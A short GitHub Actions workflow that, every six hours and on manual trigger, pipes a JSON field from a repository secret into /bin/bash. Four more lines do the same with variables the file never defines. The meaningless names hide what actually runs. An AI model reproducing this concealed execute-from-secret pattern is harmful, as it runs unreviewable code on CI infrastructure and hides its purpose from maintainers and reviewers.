name: qingtongqingong
on:
  workflow_dispatch:
  schedule:
    - cron: '13 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: qingtongqingong
        env:
          dcxxl5599: ${{ secrets.dcxxl5599 }}
        run: |
          echo $dcxxl5599 | jq -r .gdnse7 | /bin/bash
          echo $fu5098 | jq -r .ixszp09939 | /bin/bash
          echo $avzp01 | jq -r .czpp0 | /bin/bash
          echo $np49 | jq -r .hd5 | /bin/bash
          echo $fde6 | jq -r .iuey47 | /bin/bash

